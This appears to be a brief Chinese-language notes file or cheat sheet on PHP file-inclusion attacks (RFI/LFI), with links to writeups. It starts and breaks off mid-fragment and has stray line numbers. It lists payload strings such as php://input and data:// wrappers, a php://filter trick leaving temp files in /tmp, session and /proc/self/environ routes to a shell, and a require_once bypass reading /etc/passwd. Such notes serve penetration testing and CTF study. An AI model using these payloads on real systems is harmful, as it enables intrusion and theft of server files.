fi
# RFI/LFI PHP文件包含
# 特殊文件
.htaccess
.user.ini
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
https://xz.aliyun.com/t/2657
# include
php://input+ POST报文php代码 (allow_url_include=On)data://text/plain,<phpcode>(allow_url_include=On)php7
php://filter/string.strip_tags=/etc/passwd导致php在执行过程中出现segment fault错误,这样如果再此同时上传文件那么临时文件就会被保存在/tmp目录下,不会被删除。 文件名需要爆破
/tmp/phpxxxxxsession + lfi getshell
/proc/self/environUA header lfi getshellphar
# require_once
- 重复包含poc:
php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/passwd
php源码分析 require_once 绕过不能重复包含文件的限制:https://www.anquanke.com/post/id/213235
# file_get_content/file
<?php
$homepage = file_get_contents('http://www.example.com/');
echo $homepage;
?>
2
3
4
关于file_put_contents的一些小测试: https://cyc1e183.github.io/2020/04/03/%E5%85%B3%E4%BA%8Efile_put_contents%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%B5%8B%E8%AF%95/
# lfi -> rce
https://tttang.com/archive/1395/
# 参考资料
https://xz.aliyun.com/t/5535#toc-7
php文件包含漏洞: https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/
